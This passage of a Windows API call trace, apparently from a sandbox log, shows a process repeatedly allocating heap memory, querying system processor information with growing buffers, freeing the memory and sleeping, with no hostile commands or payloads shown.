Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.876] Sleep (dwMilliseconds=0x110) [0205.887] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.891] Sleep (dwMilliseconds=0x110) [0205.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.909] Sleep (dwMilliseconds=0x110) [0205.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.923] Sleep (dwMilliseconds=0x110) [0205.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.938] Sleep (dwMilliseconds=0x110) [0205.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.953] Sleep (dwMilliseconds=0x110) [0205.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.972] Sleep (dwMilliseconds=0x110) [0205.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.987] Sleep (dwMilliseconds=0x110) [0205.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.004] Sleep (dwMilliseconds=0x110) [0206.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.016] Sleep (dwMilliseconds=0x110) [0206.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.033] Sleep (dwMilliseconds=0x110) [0206.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.044] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.048] Sleep (dwMilliseconds=0x110) [0206.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.114] Sleep (dwMilliseconds=0x110) [0206.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.127] Sleep (dwMilliseconds=0x110) [0206.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.141] HeapFree (in: hHeap=0x2560000, 